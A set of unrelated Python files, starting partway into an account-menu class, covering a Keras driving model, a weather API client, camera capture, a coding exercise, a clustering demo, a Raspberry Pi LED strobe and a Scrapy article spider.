def _loggedin(self, email: str, id: int) -> None:
self.email = email
self.id = id
self._set_actions()
self._set_options()
print("You are logged in.\n")
def _loggedout(self) -> None:
self.email = ""
self.id = None
self._set_actions()
self._set_options()
print("You have been logged out.\n")
def _set_options(self) -> None:
if self._is_loggedin():
self.options = {
"1": "Print log",
"2": "Change email",
"3": "Change password",
"4": "Log out",
"5": "Delete account",
}
else:
self.options = {"1": "Register", "2": "Login"}
def _set_actions(self) -> None:
if self._is_loggedin():
self.actions = {
"Print log": self.print_log,
"Change email": self.change_email,
"Change password": self.change_password,
"Log out": self.logout,
"Delete account": self.delete_account,
}
else:
self.actions = {"Register": self.register, "Login": self.login}
@classmethod
def validate_email(cls, email: str) -> None:
msg = "Invalid email address. Try x@x.x, where 'x' can be any alphanumeric char.\n"
assert cls.EMAIL_REGEX.fullmatch(email), msg
@classmethod
def validate_password(cls, pw1: str, pw2: str) -> None:
assert pw1 == pw2, "Passwords must match.\n"
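# A minimal driver loop (an added sketch, not part of the original module). It
# assumes Users() and Logs() can be constructed with no arguments, which may not
# match the real `users` module; adjust the construction as needed.
if __name__ == "__main__":
    ui = Interface(Users(), Logs())
    while True:
        print(ui.options)
        choice = input("Choose an option (blank to quit): ")
        action_name = ui.options.get(choice)
        if action_name is None:
            break
        try:
            ui.actions[action_name]()
        except (InvalidAction, MaxTries) as err:
            print(err)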
|
import csv
import random
import numpy as np
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten, Lambda
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.preprocessing.image import img_to_array, load_img
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
# Constants
steering_offset = 0.3
data_path = "data/"
# Load the data and offset the steering on left and right images.
def get_image_path_and_labels(data_file):
img_paths, steering_angles = [], []
with open(data_file) as fin:
skip_next_entry = True
for center_img, left_img, right_img, steering_angle, throttle, break_power, speed in csv.reader(fin):
# The first entry is just the header so skip it.
if skip_next_entry:
skip_next_entry = False
continue
# Add the center, left, and right images paths.
img_paths += [center_img.strip(), left_img.strip(), right_img.strip()]
            # Add the steering angles; the left/right camera images get +/- steering_offset applied.
steering_angles += [float(steering_angle), float(steering_angle) + steering_offset, float(steering_angle) - steering_offset]
return img_paths, steering_angles
# Process the image
def process_image(image_path, steering_angle):
# Compress the size to 100x100 so we can train faster.
image = load_img(image_path, target_size=(100,100,3))
image = img_to_array(image)
return image, steering_angle
# Generator
def generator(batch_size, x, y):
while 1:
batch_x, batch_y = [], []
for i in range(batch_size):
index = random.randint(0, len(x) - 1)
steering_angle = y[index]
image, steering_angle = process_image(data_path + x[index], steering_angle)
batch_x.append(image)
batch_y.append(steering_angle)
# Also add to the batch a flipped version of the image.
image_flipped = np.fliplr(image)
steering_angle_flipped = -steering_angle
batch_x.append(image_flipped)
batch_y.append(steering_angle_flipped)
yield np.array(batch_x), np.array(batch_y)
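# Note (added): each yielded batch contains 2 * batch_size samples, because every
# sampled image is also appended in horizontally-flipped form with its steering
# angle negated.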
# Define the training model.
def model(shape):
# We must use SAME padding so the output size isn't reduced too small before flattening the network.
border_mode = 'same'
model = Sequential()
# Normalize the input.
model.add(Lambda(lambda x: (x / 255.0) - 0.5, input_shape=shape, output_shape=shape))
model.add(Convolution2D(24, 5, 5, activation='relu', border_mode=border_mode))
model.add(MaxPooling2D())
model.add(Convolution2D(36, 5, 5, activation='relu', border_mode=border_mode))
model.add(MaxPooling2D())
model.add(Convolution2D(48, 5, 5, activation='relu', border_mode=border_mode))
model.add(MaxPooling2D())
model.add(Convolution2D(64, 3, 3, activation='relu', border_mode=border_mode))
model.add(MaxPooling2D())
model.add(Convolution2D(64, 3, 3, activation='relu', border_mode=border_mode))
model.add(MaxPooling2D())
model.add(Flatten())
model.add(Dense(1164, activation='relu'))
model.add(Dropout(0.35))
model.add(Dense(100, activation='relu'))
model.add(Dropout(0.35))
model.add(Dense(50, activation='relu'))
model.add(Dropout(0.35))
model.add(Dense(10, activation='relu'))
model.add(Dense(1, activation='linear'))
model.compile(loss='mse', optimizer="adam")
return model
# Train the model.
def train():
net = model(shape=(100,100,3))
    # Print the structure of the network
for layer in net.layers:
print(layer, layer.output_shape)
# Get the image paths, and steering angles.
x, y = get_image_path_and_labels(data_path + 'driving_log.csv')
# Shuffle the data.
x, y = shuffle(x, y, random_state=42)
# Split into training and validation sets.
x_train, x_val, y_train, y_val = train_test_split(x, y, test_size=0.15, random_state=42)
# Train the model.
net.fit_generator(generator(64, x_train, y_train),
validation_data=generator(64, x_val, y_val),
nb_val_samples=12000,
samples_per_epoch=48000,
nb_epoch=3)
# Save the model.
net.save('model.h5')
# Activate this script
if __name__ == '__main__':
train()
|
class Player(object):
def __init__(self, player):
self.values = player
def __eq__(self,other):
return self.values == other.values
'''We don't need this method anymore'''
def getValidMoves(self, board):
return board.getValidMoves()
def makeMove(self, board, col):
return
|
import requests
import datetime # for unix UTC conversion
# COMPLEX WEATHER
def fullData():
# GET URL AND ENTER KEYS
key = input('Enter your API key: ')
location = input('Enter the location to search: ')
url = 'http://api.openweathermap.org/data/2.5/weather?q=' + location + '&appid=' + key
# LOAD DATA
r = requests.get(url)
response_dict = r.json()
location = response_dict['name']
country = response_dict['sys']['country']
latitude = response_dict['coord']['lat']
longitude = response_dict['coord']['lon']
weather = response_dict['weather'][0]['main']
weatherDesc = response_dict['weather'][0]['description']
    temperature = response_dict['main']['temp']-273.16 # convert to Celsius
maximum = response_dict['main']['temp_max']-273.16
minimum = response_dict['main']['temp_min']-273.16
humidity = response_dict['main']['humidity']
pressure = response_dict['main']['pressure']
cloudCover = response_dict['clouds']['all'] # in percentage
windspeed = response_dict['wind']['speed'] # in m/s
try:
windDir = response_dict['wind']['deg'] # in degrees
except KeyError:
windDir = 'no data'
sunrise = response_dict['sys']['sunrise'] # both of these in unix UTC
sunset = response_dict['sys']['sunset']
# DISPLAY DATA
print(location + ', ' + country)
print('Lat:', latitude)
print('Lon:', longitude)
print('\n' + weather + ', ' + weatherDesc)
print('Temp: %.2f' % temperature + '°C')
print('Max: %.2f' % maximum + '°C')
print('Min: %.2f' % minimum + '°C')
print('\nHumidity: %.2f' % humidity + '%')
print('Pressure: %.2f' % pressure + 'hPa')
print('Clouds: %.1f' % cloudCover + ' % cover')
print('Wind blowing %.2f ' % windspeed + 'm/s at bearing ' + str(windDir))
print('\nSunrise')
print(datetime.datetime.fromtimestamp(int(sunrise)).strftime('%H:%M:%S:%A'))
print('Sunset')
print(datetime.datetime.fromtimestamp(int(sunset)).strftime('%H:%M:%S:%A'))
def forcastDays():
key = input('Enter your API key: ')
location = input('Enter the location to search: ')
    days = int(input('How many days to forecast? (max. 16): '))
    url = 'http://api.openweathermap.org/data/2.5/forecast/daily?q=' + location + '&cnt=' + str(days) + '&mode=json&appid=' + key
# LOAD DATA
r = requests.get(url)
response_dict = r.json()
# GET NUMBER OF DAYS
    print(str(days) + '-day forecast for ' + response_dict['city']['name'] + ', ' + response_dict['city']['country'])
# RUN FOR LOOP BASED ON GIVEN DAYS
for i in range(days):
today = response_dict['list'][i]
# GET THE DAY BASED ON UNIX TIMESTAMP
print('\n' + datetime.datetime.fromtimestamp(today['dt']).strftime('%A'))
print(today['weather'][0]['main'] + ', ' + today['weather'][0]['description'])
print('Humidity: ' + str(today['humidity']) + '%')
print('Cloud Cover: ' + str(today['clouds']) + '%')
print('The wind is blowing at ' + str(today['speed']) + 'm/s at bearing ' + str(today['deg']))
print('Max: %.2f' % (float((today['temp']['max'])-273.16)) + '°C')
        print('Min: %.2f' % (float((today['temp']['min'])-273.16)) + '°C')
# USER CHOICE
print('Would you like weather or a forecast?')
userChoice = int(input('1: Weather 2: Forecast \n>> '))
if userChoice == 1:
fullData()
elif userChoice == 2:
forcastDays()
else:
print('Invalid input!')
|
#!/usr/bin/env python3
import asi
import numpy as np
import cv2
def main():
print('Warning: No checking for error return codes!')
asi.ASIGetNumOfConnectedCameras()
rtn, info = asi.ASIGetCameraProperty(0)
frame_size = info.MaxWidth * info.MaxHeight
asi.ASIOpenCamera(info.CameraID)
asi.ASIInitCamera(info.CameraID)
asi.ASISetROIFormat(info.CameraID, info.MaxWidth, info.MaxHeight, 1, asi.ASI_IMG_RAW8)
asi.ASISetControlValue(info.CameraID, asi.ASI_BANDWIDTHOVERLOAD, 94, asi.ASI_FALSE)
asi.ASISetControlValue(info.CameraID, asi.ASI_HIGH_SPEED_MODE, 1, asi.ASI_FALSE)
asi.ASISetControlValue(info.CameraID, asi.ASI_EXPOSURE, 16667, asi.ASI_FALSE)
asi.ASISetControlValue(info.CameraID, asi.ASI_GAIN, 100, asi.ASI_FALSE)
asi.ASIStartVideoCapture(info.CameraID)
cv2.namedWindow('video', cv2.WINDOW_NORMAL)
cv2.resizeWindow('video', 640, 480)
frame_count = 0
while True:
dropped_frame_count = asi.ASICheck(asi.ASIGetDroppedFrames(info.CameraID))
print(f'frame {frame_count:06d}, dropped: {dropped_frame_count:06d}')
(rtn, frame) = asi.ASIGetVideoData(info.CameraID, frame_size, 0)
if frame_count % 4 == 0:
frame = np.reshape(frame, (info.MaxHeight, info.MaxWidth))
frame = cv2.cvtColor(frame, cv2.COLOR_BAYER_BG2BGR)
cv2.imshow('video', frame)
cv2.waitKey(1)
frame_count += 1
if __name__ == "__main__":
main()
|
def max_gap(numbers):
nums = sorted(numbers)
gap = 0
for i,n in enumerate(nums[:-1]):
subt = abs(nums[i+1] - n)
if gap < subt: gap = subt
return gap
'''
Task
Given an array/list of integers, find the maximum difference between
successive elements in its sorted form.
Notes
Array/list size is at least 3.
The numbers will be a mixture of positives, negatives and zeros.
Repetition of numbers in the array/list may occur.
The maximum gap is computed regardless of sign.
Input >> Output Examples
1- maxGap ({13,10,5,2,9}) ==> return (4)
Explanation:
The maximum gap after sorting the array is 4, the difference between 9 - 5 = 4.
2- maxGap ({-3,-27,-4,-2}) ==> return (23)
Explanation:
The maximum gap after sorting the array is 23, the difference between |-3 - (-27)| = 23.
Note: regardless of the sign of negativity.
3- maxGap ({-7,-42,-809,-14,-12}) ==> return (767)
Explanation:
The maximum gap after sorting the array is 767, the difference between |-809 - (-42)| = 767.
Note: regardless of the sign of negativity.
4- maxGap ({-54,37,0,64,640,0,-15}) ==> return (576)
Explanation:
The maximum gap after sorting the array is 576, the difference between |64 - 640| = 576.
Note: regardless of the sign of negativity.
'''
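# Quick sanity checks against the examples above (added for illustration):
assert max_gap([13, 10, 5, 2, 9]) == 4
assert max_gap([-3, -27, -4, -2]) == 23
assert max_gap([-7, -42, -809, -14, -12]) == 767
assert max_gap([-54, 37, 0, 64, 640, 0, -15]) == 576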
|
#!/usr/bin/python
"""
**********************************************************************************************************************************************************
*Authors : Amar Bhagwandas Lalwani (MT2012073) and Raghav Bali (MT2012108)
*
*Date : May 18 2013
*
*Project : Hierarchical Clustering System (HCS)
*Version : 1.0
*Description  : This is a demo to showcase the working of the "Hierarchical Clustering Algorithm" based on global and cluster frequent-itemsets.
* This demo works on a sample corpus which is preprocessed by "The Boolean Retrieval System (TBRS)" developed by the same authors.
* TBRS is used to generate "Term-Document-Frequency" triplet as output which is used to generate Hierarchical Clusters.
*
*Dependencies : The Boolean Retrieval System (TBRS) for preprocessing documents for clustering. [Developed by same authors]
* "python-fp-growth" for finding frequent itemsets. [Developed by Eric Naeseth]
**********************************************************************************************************************************************************
"""
"""
Import Packages
"""
import clustering_v1 ;
"""
Global Constants Defined
"""
# Global Minimum Support value. It should be ideally around 4-10% of the total documents.
global_minsup=4;
# Cluster Minimum Support value. 0.25 is a good value.
cluster_minsup=0.25;
"""
Function : generate_input_for_fpgrowth_and_document_vectors
Description  : Generate transactions and document vectors used as input for FP-growth and Hierarchical Clustering
Input Params : NA
Output : A list of the form : List[0] is a list of transactions (terms/document)
List[1] is a dictionary of the form {docname,transaction vector}
"""
output=clustering_v1.generate_input_for_fpgrowth_and_document_vectors();
"""
Function : find_global_freq_itemsets
Description : Generate Global Frequent Itemsets.
Input Params : Parameter 1 : List of unique terms/document, transaction vector.
Parameter 2 : Global minimum support value.
Output : A list of global frequent itemsets
"""
itemsets=clustering_v1.find_global_freq_itemsets(output[0],global_minsup);
"""
Function : find_feature_vectors_from_doc_vectors
Description : Generate Feature Vectors for each of the documents. Dimensionality reduction step
Input Params : Parameter 1 : List of global frequent itemsets
Parameter 2 : Dictionary of the form {docname,transaction vector}
Output       : A dictionary of the form {docname,transaction vector} with transaction vector having terms with non-zero frequencies
"""
feature_vectors=clustering_v1.find_feature_vectors_from_doc_vectors(itemsets, output[1]);
"""
Function : find_initial_assignment
Description  : Assign Documents to initial clusters. Documents may be assigned to multiple clusters at this stage.
Input Params : Parameter 1 : List of global frequent itemsets
               Parameter 2 : Dictionary of the form {docname,transaction vector} with transaction vector having terms with non-zero frequencies
Output : A list of dictionaries. List[0] is a dictionary of the form {frequent itemsets, documents assigned}
List[1] is a dictonary of the form {documents, frequent itemssets}
"""
assgnmnts=clustering_v1.find_initial_assignment(itemsets, feature_vectors);
"""
Function : find_disjoint_clusters
Description : Assign Documents to disjoint clusters. Documents are assigned only to one cluster at this step.
Input Params : Parameter 1 : Document Cluster. Dictonary of the form {documents, frequent itemssets}
Parameter 2 : Initial Assignment. Dictionary of the form {frequent itemsets, documents assigned}
Parameter 3 : Feature Vectors. A dictionary of the form {docname,transaction vector} with transaction vector
                             having terms with non-zero frequencies
Parameter 4 : A list of global frequent itemsets
               Parameter 5 : Cluster Minimum Support value
Output : A dictionary of the form {frequent itemsets, document vectors}
"""
clustering=clustering_v1.find_disjoint_clusters(assgnmnts[1],assgnmnts[0], feature_vectors, itemsets, cluster_minsup);
"""
Printing the disjoint clusters formed above in clustering.txt
"""
fp=open('../ClusterOutput/disjoint_clusters.txt','w');
cluster_tuples=clustering.items();
pruned_tuples = {}
for cluster in cluster_tuples:
if(len(cluster[1])>0):
#Print the cluster label
fp.write(str(cluster[0]));
fp.write('-');
pruned_tuples[cluster[0]]=cluster[1];
for docs in cluster[1]:
if(docs==cluster[1][len(cluster[1])-1]):
#Print the document name
fp.write(docs);
fp.write('\n');
else:
#Print the document name
fp.write(docs);
fp.write(',');
fp.close();
print "[*]Disjoint clusters : disjoint_clusters.txt [done] "
"""
Function : find_descendants
Description  : Find descendants for all disjoint clusters to obtain cluster frequent items and cluster support used in score calculation.
Input Params : Parameter 1 : Disjoint Document Clusters. A dictionary of the form {frequent itemsets, document vectors}
Parameter 2 : Disjoint Document Clusters with non-empty document lists. Dictionary of the form {frequent itemsets, documents assigned}
Parameter 3 : A list of global frequent itemsets
Output : A dictionary of the form {frequent itemsets, document vectors}
"""
descendants=clustering_v1.find_descendants(clustering, pruned_tuples, itemsets);
"""
Print the descendants of each of the disjoint clusters
"""
fp=open('../ClusterOutput/descendants.txt','w');
cluster_tuples=descendants.items();
for cluster in cluster_tuples:
if(len(cluster[1])>0):
fp.write(str(cluster[0]));
fp.write('-');
for docs in cluster[1]:
if(docs==cluster[1][len(cluster[1])-1]):
fp.write(docs);
fp.write('\n');
else:
fp.write(docs);
fp.write(',');
fp.close();
print "[*]Descendants : descendants.txt [done] "
"""
Function : delete_empty_leaf_nodes
Description : Delete all empty leaf clusters
Input Params : Parameter 1 : Disjoint Document Clusters. A dictionary of the form {frequent itemsets, document vectors}
Parameter 2 : A list of global frequent itemsets
Output : A dictionary of the form {frequent itemsets, document vectors} with non-empty leaf nodes
"""
refined_clusters=clustering_v1.delete_empty_leaf_nodes(clustering, itemsets);
"""
Function : build_tree
Description : Build Tree structure from disjoint clusters pruned in previous steps
Input Params : Parameter 1 : A list of global frequent itemsets
Parameter 2 : Feature Vectors. A dictionary of the form {docname,transaction vector} with transaction vector
                             having terms with non-zero frequencies
Parameter 3 : Descendants. A dictionary of the form {frequent itemsets, document vectors}
Parameter 4 : A dictionary of the form {frequent itemsets, document vectors} with non-empty leaf nodes
Parameter 5 : Cluster Minimum Support value
Output : A list of dictionaries.
"""
tree=clustering_v1.build_tree(itemsets, feature_vectors, descendants, refined_clusters, cluster_minsup);
"""
Print the Tree structure
"""
fp=open('../ClusterOutput/initial_cluster_tree.txt','w');
cluster_tuples=tree[0].items();
for cluster in cluster_tuples:
if(len(cluster[1])>0):
fp.write(str(cluster[0]));
fp.write('-');
for docs in cluster[1]:
if(docs==cluster[1][len(cluster[1])-1]):
fp.write(docs);
fp.write('\n');
else:
fp.write(docs);
fp.write(',');
fp.close();
print "[*]Initial Tree : initial_cluster_tree.txt [done] "
"""
Function : child_prune
Description : Prune Child nodes in a chain of clusters
Input Params : Parameter 1 : A dictionary of the form {frequent itemsets, document vectors} with non-empty leaf nodes
Parameter 2 : Tree[0]
Parameter 3 : Tree[1]
Parameter 4 : A list of global frequent itemsets
Parameter 5 : Feature Vectors. A dictionary of the form {docname,transaction vector} with transaction vector
                             having terms with non-zero frequencies
Parameter 6 : A dictionary of the form {frequent itemsets, document vectors}
Parameter 7 : Cluster Minimum support values
Output       : Pruned tree dictionary
"""
pruning=clustering_v1.child_prune(refined_clusters, tree[0], tree[1], itemsets, feature_vectors, descendants, cluster_minsup);
"""
Print Pruned clusters
"""
fp=open('../ClusterOutput/pruned_clusters.txt','w');
cluster_tuples=pruning[0].items();
for cluster in cluster_tuples:
if(len(cluster[1])>0):
fp.write(str(cluster[0]));
fp.write('-');
for docs in cluster[1]:
if(docs==cluster[1][len(cluster[1])-1]):
fp.write(docs);
fp.write('\n');
else:
fp.write(docs);
fp.write(',');
fp.close();
print "[*]Pruned Clusters : pruned_clusters.txt [done] "
"""
Print Pruned Tree
"""
fp=open('../ClusterOutput/pruned_tree.txt','w');
cluster_tuples=pruning[1].items();
for cluster in cluster_tuples:
if(len(cluster[1])>0):
fp.write(str(cluster[0]));
fp.write('-');
for docs in cluster[1]:
if(docs==cluster[1][len(cluster[1])-1]):
fp.write(docs);
fp.write('\n');
else:
fp.write(docs);
fp.write(',');
fp.close();
print "[*]Pruned Tree : pruned_tree.txt [done] "
"""
Function : merge_siblings
Description  : Merge sibling clusters in the tree built in the previous steps
Input Params : Parameter 1 : Pruned Tree [0]
Parameter 2 : Pruned Tree[1]
Parameter 3 : Pruned Tree[2]
Parameter 4 : A list of global frequent itemsets
Parameter 5 : Feature Vectors. A dictionary of the form {docname,transaction vector} with transaction vector
                             having terms with non-zero frequencies
Parameter 6 : A dictionary of the form {frequent itemsets, document vectors}
Parameter 7 : Cluster Minimum support values
Output : Sibling merged tree dictionary
"""
final=clustering_v1.merge_siblings(pruning[0], pruning[1], pruning[2], itemsets, feature_vectors, descendants, cluster_minsup);
"""
Print the final output
"""
fp=open('../ClusterOutput/output_clusters.txt','w');
cluster_tuples=final[0].items();
for cluster in cluster_tuples:
if(len(cluster[1])>0):
fp.write(str(cluster[0]));
fp.write('-');
fp.write(str(cluster[1]));
fp.write('\n');
fp.close();
print "[*]Output Clusters : output_clusters.txt [done] "
"""
Print the parents
"""
fp=open('../ClusterOutput/output_tree.txt','w');
cluster_tuples=final[1].items();
for cluster in cluster_tuples:
if(len(cluster[1])>0):
fp.write(str(cluster[0]));
fp.write('-');
fp.write(str(cluster[1]));
fp.write('\n');
fp.close();
print "[*]Output Tree : output_tree.txt [done] "
"""
Function : find_cluster_description
Description : Describe the clusters labels with corresponding cluster frequent items
Input Params : Parameter 1 : Final Tree [0]
Parameter 2 : Final Tree [1]
Parameter 3 : Final Tree [2]
Parameter 4 : Feature Vectors. A dictionary of the form {docname,transaction vector} with transaction vector
having terms with non-zero frequencies
Parameter 5 : list of global frequent itemsets
Parameter 6 : Cluster Minimum support values
Output : Dictionary of cluster label description
"""
description=clustering_v1.find_cluster_description(final[0], final[1], final[2], feature_vectors, itemsets, cluster_minsup);
"""
Print the cluster description
"""
fp=open('../ClusterOutput/cluster_description.txt','w');
cluster_tuples=description.items();
for cluster in cluster_tuples:
if(len(cluster[1])>0):
fp.write(str(cluster[0]));
fp.write('-');
fp.write(str(cluster[1]));
fp.write('\n');
fp.close();
print "[*]Cluster Description : cluster_description.txt [done] "
"""
**********************************************************************************************************************************************************
End of Code
**********************************************************************************************************************************************************
"""
|
import sys #import sys to get arguments
mode=sys.argv[1]
#command parsing
if mode=="-help": #help screen
print("USAGE:")
print("python hertz.py hertz [pin] [length] [hertz] [debug]")
print("eg. \"python hertz.py hertz 18 10 30\"")
print("python hertz.py delay [pin] [length] [delay] [debug]")
print("eg. \"python hertz.py delay 18 10 1\"")
print("python hertz.py customDelay [pin] [length] [offDelay] [onDelay] [debug]")
print("eg. \"python hertz.py customDelay 18 10 0.2 1\"")
print("for debug, add \"debug\" at the end of the command")
print("for infinite time, put \"-1\" as the time")
print("to oscillate between multiple pins, put [pin1,pin2] as the pin")
print("eg. python hertz.py hertz [18,23] -1 1")
quit()
elif mode=="hertz": #python hertz.py hertz [pin] [length] [hertz] [debug]
delay=None
onPercent=100
offPercent=100
hertz=float(sys.argv[4])
length=float(sys.argv[3])
onWait=(1.0/float(hertz))*(float(onPercent)/100.0) #calculate time for led to be on
offWait=(1.0/float(hertz))*(float(offPercent)/100.0) #calculate time for led to be off
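#example: hertz=2 with onPercent=offPercent=100 gives onWait=0.5 and offWait=0.5,
#so one full on/off cycle takes 1.0s (2/hertz seconds while both percents stay at 100)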
try: #check for debug
if sys.argv[5]=="debug":
debug=True
except:
debug=False
elif mode=="delay": #python hertz.py delay [pin] [length] [delay] [debug]
hertz=None
onPercent=100
offPercent=100
length=float(sys.argv[3])
delay=float(sys.argv[4])
onWait=delay #calculate time for led to be on
offWait=delay #calculate time for led to be off
try: #check for debug
if sys.argv[5]=="debug":
debug=True
except:
debug=False
elif mode=="customDelay": #python hertz.py customDelay [pin] [length] [offDelay] [onDelay] [debug]
hertz=None
onPercent=100
offPercent=100
length=float(sys.argv[3])
delay=None
offWait=float(sys.argv[4])
onWait=float(sys.argv[5])
try: #check for debug
if sys.argv[6]=="debug":
debug=True
except:
debug=False
else: #unknown mode: print a hint and exit so later code never touches undefined variables
print("unknown mode \""+str(mode)+"\". run \"python hertz.py -help\" for usage")
quit()
#define debug functions
if debug: #import datetime for debug logs
from datetime import datetime
def log(message): #define logging function to prevent repeated code
currentTime = str(datetime.now().time())
print("["+currentTime+"] "+message)
def done(): #log program exits if debug mode
if debug:
log("program exiting...")
quit()
#import needed libraries
#check if gpio installed
try:
import RPi.GPIO as GPIO #import pin control
except:
print("RPI.GPIO not installed!!!")
done()
import time #import time for delay
#init GPIO
GPIO.setmode(GPIO.BCM) #use BCM pin numbering
GPIO.setwarnings(debug) #set warnings to on if debug mode, off otherwise
#parse pin to use
try:
pin=int(sys.argv[2])
doublePin=False
except:
import ast
pin=ast.literal_eval(sys.argv[2]) #parse input into list
pin1=pin[0] #set pin
pin2=pin[1]
doublePin=True
#log pin setup if debug (pin1/pin2 only exist in doublePin mode)
if debug:
log("doublePin: "+ str(doublePin))
if doublePin:
log("pin1: "+ str(pin1))
log("pin2: "+ str(pin2))
#init pin to use
try: #check for ValueError (invalid pin)
if not doublePin: #init single pin if not doublePin
GPIO.setup(int(pin),GPIO.OUT) #init used pin
else:
GPIO.setup(int(pin1),GPIO.OUT)
GPIO.setup(int(pin2),GPIO.OUT)
except:
if doublePin: #error
print("either pin "+str(pin1)+" or pin "+str(pin2)+" is invalid!")
else:
print("pin \""+str(pin)+"\" is not valid") #log error
done()
#print variables if debug
if debug:
log("mode: "+str(mode)) #print all arguments
log("pin: "+str(pin))
log("hertz: "+str(hertz)) #hertz mode only
log("delay: "+str(delay)) #delay mode only
log("length: "+str(length))
log("offPercent: "+str(offPercent))
log("onPercent: "+str(onPercent))
log("offWait: "+str(offWait))
log("onWait: "+str(onWait))
#LED control functions
def on(GPIOused): #define on function to avoid repeated code
GPIO.output(int(GPIOused),GPIO.HIGH) #on
if debug:
log("led on pin"+str(GPIOused)+" on")
def off(GPIOused): #define off function to avoid repeated code
GPIO.output(int(GPIOused),GPIO.LOW) #off
if debug:
log("led on pin"+str(GPIOused)+" off")
#check for infinite time
if int(length)==-1:
infinite=True
if debug:
log("length is -1. making infinite true") #log in debug
else:
infinite=False
#set needed vars
timeStrobing=0
if debug:
iteration=0 #track number of iterations if debug
#main program
try: #enclose loop to make keyboardinterrupt shut down led before closing
#strobe loop
while True:
#track number of iterations if debug
if debug:
iteration+=1 #increment iterations
log("iteration: "+str(iteration)) #print iterations
#toggle LED and wait
if not doublePin:
on(pin) #turn LED on
else:
on(pin1)
off(pin2)
time.sleep(onWait) #delay before turning off
#add time used for strobing in previous half-iteration to counter
timeStrobing=timeStrobing+onWait
#print timeStrobing if debug
if debug:
log("timeStrobing: "+str(timeStrobing))
#if infinite, dont do timecheck
if not infinite:
if timeStrobing>=float(length): #check if timeStrobing is more than needed strobe time
if debug:
log("timeStrobing >= length") #print that timeStrobing >= length if debug mode
if doublePin: #turn off all leds
off(pin1)
else:
off(pin)
done() #exit program
#turn off led and wait
if not doublePin:
off(pin) #turn LED off
else:
off(pin1)
on(pin2)
time.sleep(offWait) #delay before turning on
#add time used for strobing in previous half-iteration to counter
timeStrobing=timeStrobing+offWait #add delay before turning on to current duration of strobing.
#print timeStrobing if debug
if debug:
log("timeStrobing: "+str(timeStrobing))
#if infinite, dont do timecheck
if not infinite: #if infinite, dont do timecheck
if timeStrobing>=float(length): #check if timeStrobing is more than needed strobe time
if debug:
log("timeStrobing >= length") #print that timeStrobing >= length if debug mode
if doublePin: #turn off all leds
off(pin2)
else:
off(pin)
done() #exit program
#error handling
except KeyboardInterrupt: #ctrl-c
if debug:
log("ctrl-c detected. turning led off and exiting.") #log that ctrl-c detected
if doublePin: #turn off all leds
off(pin1)
off(pin2)
else:
off(pin)
done()
|
# -*- coding: utf-8 -*-
import scrapy
import json
import time
from OwhatLab.conf.configure import *
from OwhatLab.utils.myredis import RedisClient
from OwhatLab.items import OwhatLabArticleItem, OwhatLabUserIterm
class SpiderArticlesInfoSpider(scrapy.Spider):
name = 'spider_articles_info'
allowed_domains = ['appo4.owhat.cn']
start_urls = ['http://appo4.owhat.cn/']
# Channel homepage url: PreUrl + listMainUrl
PreUrl = "https://appo4.owhat.cn/api?"
# jalouse channel homepage -- this channel has only one user (user_id=8244418), so there is no need to traverse the whole list; just assign user_id directly
flag1 = 0
# User detail page -- article-info url, the same for every channel:
#ArticleMainUrl = "apiv=1.0.0&client=%7B%22platform%22%3A%22ios%22%2C%22deviceid%22%3A%22E1DBCBDA-629A-4491-98BC-39B8DFEC248C%22%2C%22channel%22%3A%22AppStore%22%2C%22version%22%3A%221.2.2L%22%7D&cmd_m=home&cmd_s=userindex&data=%7B%22userid%22%3A{}%2C%22tabtype%22%3A2%2C%22pagenum%22%3A{}%2C%22pagesize%22%3A%2220%22%7D&requesttimestap=1575256658.578629&v=1.0"
# "apiv=1.0.0&client=%7B%22platform%22%3A%22ios%22%2C%22deviceid%22%3A%22E1DBCBDA-629A-4491-98BC-39B8DFEC248C%22%2C%22channel%22%3A%22AppStore%22%2C%22version%22%3A%221.2.2L%22%7D&cmd_m=home&cmd_s=userindex&data=%7B%22userid%22%3A%228244418%22%2C%22tabtype%22%3A2%2C%22pagenum%22%3A%221%22%2C%22pagesize%22%3A%2220%22%7D&requesttimestap=1575283078.534425&v=1.0"
#Crawl steps: first open the homepage url of a specific channel and find the content list (20 items per page, paginated) ----- then find the corresponding user_id for each item in the list ------- finally pass the user_id into ArticleMainUrl and crawl all of that user's article info
def __init__(self):
# connect redis
self.redisClient = RedisClient.from_settings(DB_CONF_DIR)
new_CHANNEL_CONF = json.dumps(CHANNEL_CONF)
self.redisClient.put("CHANNEL_CONF", new_CHANNEL_CONF, None, False)
self.article_set_key = REDIS_KEY['article_id']
channelJsonStr = self.redisClient.get("CHANNEL_CONF", -1)
self.channelDict = json.loads(channelJsonStr)
#print(self.channelDict)
print('Owhat article-info spider starting...')
def start_requests(self):
for value in self.channelDict.values():
if value['itemIndex'] in ['1','2','9','10','11','12']:
self.flag1 = 1
curPage = 1
cmd_m = value['cmd_m']
cmd_s = value['cmd_s']
itemIndex = value['itemIndex']
columnid = str(value['columnid'])
apiv = value['apiv']
while curPage > 0 and self.flag1 == 1 and curPage < 81:
# print('curPage:', curPage)
print('Article-info crawl: fetching itemIndex={}, channel={}, page {}...'.format(itemIndex, columnid, curPage))
if itemIndex == '2':
tempUrl = apiv.format(cmd_m, cmd_s, itemIndex, columnid, curPage)
else:
tempUrl = apiv.format(cmd_m, cmd_s, columnid, itemIndex, curPage)
curPage += 1
listUrl = self.PreUrl + tempUrl
#print('Article-info crawl listUrl:', listUrl)
time.sleep(5)
yield scrapy.Request(listUrl, method='POST', # headers=self.headers,
callback=self.parseListUrl)
else:
continue
def parseListUrl(self, response):
# print(response.text)
if response.status != 200:
print('get url error: ' + response.url)
return
rltJson = json.loads(response.text)
content = rltJson['data']
if content == "":
print('get list interface error: ' + response.text)
return
videoList = content['list'] #the returned value is an array
#print('videoList contents:', videoList)
if len(videoList) > 0:
for videoInfo in videoList:
if 'articlestatus' in videoInfo:
#print('videoInfo:',videoInfo)
article_id = videoInfo['entityid']
#print(article_id)
flag = self.redisClient.sismember(self.article_set_key, article_id)
if flag == 1:
#print('This article has already been crawled, skip it')
continue
else:
self.redisClient.sadd(self.article_set_key, article_id)
yield self.getArticleInfoItem(videoInfo) # the yield here is required
else:
continue
else:
#print('Finished crawling the articles on this channel homepage!')
self.flag1 = 0
return
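# Dedup note: article ids are tracked in a Redis set (self.article_set_key); sismember() checks
# whether an id has been seen before and sadd() records new ids, so re-running the spider skips
# articles that were already crawled.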
def getArticleInfoItem(self, article):
articleItem = OwhatLabArticleItem()
if 'entityid' in article:
articleItem['article_id'] = article['entityid']
if 'publishtime' in article:
articleItem['publish_time'] = str(article['publishtime'])[0:10]
if 'title' in article:
articleItem['title'] = article['title']
